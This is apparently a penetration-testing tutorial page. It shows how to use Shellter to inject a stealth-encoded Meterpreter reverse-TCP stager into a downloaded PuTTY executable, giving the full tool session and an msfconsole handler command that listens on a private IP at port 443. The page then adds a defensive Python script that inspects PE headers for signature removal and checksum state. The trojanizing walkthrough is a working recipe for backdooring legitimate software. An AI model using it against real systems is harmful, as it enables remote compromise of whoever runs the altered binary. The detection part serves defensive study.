Shellter
Shellter inserts a payload inside a legitimate executable.
Tip
The payload must be 32-bit for Shellter to work correctly.
For example, to insert a Meterpreter into the PuTTY executable:
wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
shellter
1010101 01 10 0100110 10 01 11001001 0011101 001001
11 10 01 00 01 01 01 10 11 10
0010011 1110001 11011 11 10 00 10011 011001
11 00 10 01 11 01 11 01 01 11
0010010 11 00 0011010 100111 000111 00 1100011 01 10 v7.2
www.ShellterProject.com Wine Mode
Choose Operation Mode - Auto/Manual (A/M/H): A
PE Target: putty.exe
**********
* Backup *
**********
Backup: A backup of the file was not taken!
If another backup with the same file name, is already located in the
Shellter_Backups directory there is no need to report this issue.
If this is an attempt to add another payload to a previously infected
application by Shellter, then you can continue working with this file.
Otherwise, you should consider taking a copy of the original file from
the backups directory in order to avoid re-using a previously infected
binary.
Shellter Pro supports chaining of multiple payloads in a single injection,
which is a lot more effective than re-infecting the same PE file multiple
times.
Please Report To Author.
Last_Error_Code: 80 || Le fichier existe.
Shellter will now proceed...
********************************
* PE Compatibility Information *
********************************
Minimum Supported Windows OS: 5.1
Note: It refers to the minimum required Windows version for the target
application to run. This information is taken directly from the
PE header and might be not always accurate.
******************
* Packed PE Info *
******************
Status: Possibly Not Packed - The EntryPoint is located in the first section!
***********************
* PE Info Elimination *
***********************
Data: Dll Characteristics (Dynamic ImageBase etc...), Digital Signature.
Status: All related information has been eliminated!
****************
* Tracing Mode *
****************
Status: Tracing has started! Press CTRL+C to interrupt tracing at any time.
Note: In Auto Mode, Shellter will trace a random number of instructions
for a maximum time of approximately 30 seconds in native Windows
hosts and for 60 seconds when used in Wine.
DisASM.dll was created successfully!
Instructions Traced: 131341
Tracing Time Approx: 1.02 mins.
Starting First Stage Filtering...
*************************
* First Stage Filtering *
*************************
Filtering Time Approx: 0.008 mins.
Enable Stealth Mode? (Y/N/H): Y
************
* Payloads *
************
[1] Meterpreter_Reverse_TCP [stager]
[2] Meterpreter_Reverse_HTTP [stager]
[3] Meterpreter_Reverse_HTTPS [stager]
[4] Meterpreter_Bind_TCP [stager]
[5] Shell_Reverse_TCP [stager]
[6] Shell_Bind_TCP [stager]
[7] WinExec
Use a listed payload or custom? (L/C/H): L
Select payload by index: 1
***************************
* meterpreter_reverse_tcp *
***************************
SET LHOST: 192.168.45.218
SET LPORT: 443
****************
* Payload Info *
****************
Payload: meterpreter_reverse_tcp
Size: 281 bytes
Reflective Loader: NO
Encoded-Payload Handling: Enabled
Handler Type: IAT
******************
* Encoding Stage *
******************
Encoding Payload: Done!
****************************
* Assembling Decoder Stage *
****************************
Assembling Decoder: Done!
***********************************
* Binding Decoder & Payload Stage *
***********************************
Status: Obfuscating the Decoder using Thread Context Aware Polymorphic
code, and binding it with the payload.
Please wait...
Binding: Done!
*********************
* IAT Handler Stage *
*********************
Fetching IAT Pointers to Memory Manipulation APIs...
0. VirtualAlloc --> N/A
1. VirtualAllocEx --> N/A
2. VirtualProtect --> N/A
3. VirtualProtectEx --> N/A
4. HeapCreate/HeapAlloc --> N/A
5. LoadLibrary/GetProcAddress --> IAT[4ffe30]/IAT[4ffda8]
6. GetModuleHandle/GetProcAddress --> IAT[4ffd9c]/IAT[4ffda8]
7. CreateFileMapping/MapViewOfFile --> IAT[4ffcdc]/IAT[4ffe50]
Using Method --> 7
***************************
* IAT Handler Obfuscation *
***************************
Status: Binding the IAT Handler with Thread Context Aware Polymorphic code.
Please wait...
Code Generation Time Approx: 0.02 seconds.
*************************
* PolyMorphic Junk Code *
*************************
Type: Engine
Generating: ~572 bytes of PolyMorphic Junk Code
Please wait...
Generated: 576 bytes
Code Generation Time Approx: 0.022 seconds.
Starting Second Stage Filtering...
**************************
* Second Stage Filtering *
**************************
Filtering Time Approx: 0.00117 mins.
*******************
* Injection Stage *
*******************
Virtual Address: 0x4352b0
File Offset: 0x346b0
Section: .text
Adjusting stub pointers to IAT...
Done!
Adjusting Call Instructions Relative Pointers...
Done!
Injection Completed!
*******************
* PE Checksum Fix *
*******************
Status: Valid PE Checksum has been set!
Original Checksum: 0x16c3ef
Computed Checksum: 0x1705ea
**********************
* Verification Stage *
**********************
Info: Shellter will verify that the first instruction of the
injected code will be reached successfully.
If polymorphic code has been added, then the first
instruction refers to that and not to the effective
payload.
Max waiting time: 10 seconds.
Warning!
If the PE target spawns a child process of itself before
reaching the injection point, then the injected code will
be executed in that process. In that case Shellter won't
have any control over it during this test.
You know what you are doing, right? ;o)
Injection: Verified!
Press [Enter] to continue...
Then simply start a Meterpreter handler and wait for our binary to be executed:
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.45.218;set LPORT 443;run;"
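The session above reports three things Shellter does to the host binary's PE header: it removes the "Dynamic ImageBase" DllCharacteristics flag and the digital signature ("PE Info Elimination"), and it recomputes the header checksum so the file still looks consistent ("PE Checksum Fix"). The following script is an added example, not part of the original page or of the Shellter project, written from the defender's side: it reads those header fields from any PE file, recomputes the standard PE checksum, and shows why the checksum alone proves nothing while a missing signature does. The sample PE image it builds (build_sample_pe) is constructed here for offline use and carries only a placeholder WIN_CERTIFICATE record, not a real Authenticode signature; all function names are this example's own.

```python
import struct

# Constants from the PE specification.
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # "Dynamic ImageBase" in Shellter's output
IMAGE_DIRECTORY_ENTRY_SECURITY = 4               # data directory slot of the Authenticode blob
FILE_ALIGN, SECT_ALIGN, HEADERS_SIZE = 0x200, 0x1000, 0x200


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE CheckSum as computed by imagehlp's CheckSumMappedFile: fold the file's
    32-bit words with end-around carry, skipping the CheckSum field itself, fold
    to 16 bits, then add the file length. checksum_offset must be 4-byte aligned."""
    assert checksum_offset % 4 == 0
    total = 0
    padded = data + b"\0" * (-len(data) % 4)
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def _optional_header_offset(data: bytes) -> int:
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20          # skip PE signature and COFF file header


def inspect_pe(data: bytes) -> dict:
    """Report the header facts Shellter's log says it alters, plus the checksum state."""
    opt = _optional_header_offset(data)
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    is_pe32 = magic == 0x10B
    checksum_off = opt + 64                       # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    nrva_off, dd_off = (opt + 92, opt + 96) if is_pe32 else (opt + 108, opt + 112)
    nrva = struct.unpack_from("<I", data, nrva_off)[0]
    sec_size = 0
    if nrva > IMAGE_DIRECTORY_ENTRY_SECURITY:
        _, sec_size = struct.unpack_from("<II", data, dd_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    computed = pe_checksum(data, checksum_off)
    return {
        "pe32": is_pe32,
        "dynamic_base": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "has_authenticode": sec_size != 0,        # presence only; chain validation needs signtool
        "stored_checksum": stored,
        "computed_checksum": computed,
        "checksum_matches": stored == computed,
    }


def set_checksum(data: bytes) -> bytes:
    """Write a valid CheckSum, as a linker does (and as Shellter's 'PE Checksum Fix' does)."""
    buf = bytearray(data)
    off = _optional_header_offset(bytes(buf)) + 64
    struct.pack_into("<I", buf, off, pe_checksum(bytes(buf), off))
    return bytes(buf)


def build_sample_pe(dll_characteristics: int, code: bytes, with_signature: bool) -> bytes:
    """Constructed minimal PE32 with one .text section, used as offline test input.
    with_signature appends a placeholder WIN_CERTIFICATE record (not a real signature)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                   # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)         # i386, 1 section, PE32 hdr
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                   # PE32 magic
    struct.pack_into("<IIIIII", opt, 16, 0x1000, 0x1000, 0x1000, 0x400000, SECT_ALIGN, FILE_ALIGN)
    struct.pack_into("<HH", opt, 40, 5, 1)                                  # minimum OS 5.1, as in the log
    struct.pack_into("<HH", opt, 48, 5, 1)                                  # subsystem version
    struct.pack_into("<II", opt, 56, 0x2000, HEADERS_SIZE)                  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<HH", opt, 68, 3, dll_characteristics)                # CUI subsystem, DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                                     # NumberOfRvaAndSizes
    raw_size = -(-len(code) // FILE_ALIGN) * FILE_ALIGN
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, raw_size,
                       HEADERS_SIZE, 0, 0, 0, 0, 0x60000020)
    image = dos + b"PE\0\0" + coff + opt + sect
    image += b"\0" * (HEADERS_SIZE - len(image)) + code + b"\0" * (raw_size - len(code))
    if with_signature:
        cert = struct.pack("<IHH", 16, 0x0200, 0x0002) + b"\0" * 8          # WIN_CERTIFICATE header + filler
        struct.pack_into("<II", image, 88 + 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, len(image), len(cert))
        image += cert
    return bytes(image)


if __name__ == "__main__":
    pristine = set_checksum(build_sample_pe(IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, b"\x31\xc0\xc3", True))
    print(inspect_pe(pristine))
```

Run it against the putty.exe you downloaded before and after the injection: the signed vendor build reports has_authenticode True, the output of Shellter reports False, and both report checksum_matches True. That is the practical lesson for detection: a valid PE checksum is no evidence of integrity, since anyone who modifies the file can recompute it; what matters is a missing or invalid signature (validate the chain with signtool verify /pa or PowerShell's Get-AuthenticodeSignature) and a hash that no longer matches the vendor's release.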